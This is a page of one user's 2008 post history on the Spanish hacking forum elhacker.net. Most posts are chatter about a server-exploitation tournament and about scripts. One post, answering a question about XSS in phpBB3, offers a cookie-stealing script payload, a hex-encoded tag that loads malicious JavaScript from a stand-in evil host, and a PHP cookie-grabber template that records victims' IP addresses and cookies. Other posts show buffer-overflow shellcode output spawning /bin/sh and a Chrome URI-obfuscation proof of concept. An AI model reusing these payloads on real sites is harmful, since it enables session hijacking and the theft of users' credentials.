elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [20] 21 22 23 24 25 26 27 28 29 30
191  Programación / Scripting / Re: Oculta tu batch!!! en: 9 Diciembre 2008, 00:15 am
Mmmm en Windows Vista no rula,  winXP sin problema.

-berz3k.
192  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 1 Diciembre 2008, 08:45 am
@Anon

Que bueno hayas puesto un banner con las instrucciones, vaya que ya muchos conociamos algunos binarios vulenerabiles haciendo el "find / -perm", es casi como el primer paso en un auditoria Unix :D , pero muchos participantes no lo conocen, ademas es FreeBSD x86, como dice sdc no siempre tendras un Linux facil de explotar :D

Ta estoy en el 2do , a ver si tengo time en la semana

Código:
C:/Users/root/Desktop>./HoF
./HoF
fopen(): /tmp/input_7009: No such file or directory


-berz3k.
 
193  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 29 Noviembre 2008, 14:33 pm
Ya estoy dentro desde ayer XD, pero eso es la primera parte, cuando estes dentro te daras cuenta que apenas empieza esto..

-berz3k.

@Anon

Esta muy raro todo, platicando con sdc  esta algo incomodo jugar XDD , el primer BoF aveces funciona y aveces se frezzea no entiendo..

Código:
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????°1I?%A1A°↨I?1U1A°↨I?ë▼^%1A%F♀^F°♂%ó??V♀I?1U%O@I?èÜ ÿÿ/bin/shDè¿¿Dè¿¿
Bad system call
C:/Users/root/Desktop
194  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 27 Noviembre 2008, 10:13 am
Vale, pues espero nos de tiempo para apoyar , ayudar y asi mismo divertirnos un rato...

-berz3k.

195  Seguridad Informática / Nivel Web / Re: [Duda] Sql Injeccion en: 27 Noviembre 2008, 10:10 am
Datos de los cuales puedes borrar, actualizar e insetar dentro de tablas MySQL

Drop
:http://dev.mysql.com/doc/refman/5.0/en/drop-database.html

Insert
:http://dev.mysql.com/doc/refman/5.0/en/insert.html

Update:
http://dev.mysql.com/doc/refman/5.0/en/update.html

Para injeccion recomendaria uses paros proxy o cualquier otro donde puedes manipular los datos.

:http://www.parosproxy.org/


-berz3k.

196  Seguridad Informática / Nivel Web / Re: phpbb3 xss en: 27 Noviembre 2008, 08:33 am
Se dice que es vulnerable a XSS
:http://es.wikipedia.org/wiki/XSS

Donde se puede injectar diferentes codigos ya sean javascript o vBscript y que ademas no te dara explicaciones de como funciona XDD.

Se puede injectar un codigo ejemplo como este:
Código:
”;!–”<script>alert(document.cookie);</script>=&{(alert(1))}

O puedes aplicar un "redirect" con un .js mailicioso (propio) con estas caracteristicas.
Código:
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e


Donde tambien pudes usar un cookie grabber, basandote en este template:

Código:
    $ip = $_SERVER[’REMOTE_ADDR’];
    $referer = $_SERVER[’HTTP_REFERER’];
    $agent = $_SERVER[’HTTP_USER_AGENT’];

    $data = $_GET[’warwolfz’];
    $time = date(”Y-m-d G:i:s A”);
    $text = “Time: “.$time.”nIP:”.$ip.”nReferer:”.$referer.”nUser-Agent:”.$agent.”nCookie:”.$data.”nn”;

    $file = fopen(’cookies.html’ , ‘a’);
    fwrite($file,$text);
    fclose($file);

    ?>

197  Seguridad Informática / Bugs y Exploits / Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 26 Noviembre 2008, 14:03 pm

Google Chrome MetaCharacter URI Obfuscation Vulnerability

Google chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability.

Vulnerable Systems:
 * Chrome version 0.2.149.30
 * Chrome version 0.2.149.29
 * Chrome version 0.2.149.27

Proof of Concept:

Link1: http://ftp://anoymous:guest@microsoft.com
Link2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]

Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]

fuente:
http://www.secniche.org/gcuri/index.html

-berz3k.

198  Programación / .NET (C#, VB.NET, ASP) / Re: 3 proyectos Open source (Antivirus para usb) en: 15 Noviembre 2008, 12:49 pm
Moderadores, mover a Seguridad con RedMX

-berz3k.
199  Programación / .NET (C#, VB.NET, ASP) / Re: 3 proyectos Open source (Antivirus para usb) en: 15 Noviembre 2008, 07:04 am
Roces con RedMx ahora me doy cuenta que es bastante lioso...Xd

-berz3k.
200  Seguridad Informática / Nivel Web / Re: SMF 1.1.6 Hack en: 14 Noviembre 2008, 07:15 am
Yep el code no hace nada, a ver si el turco se expresa mejor y entendemos algo...

-berz3k.
Páginas: 1 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [20] 21 22 23 24 25 26 27 28 29 30
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines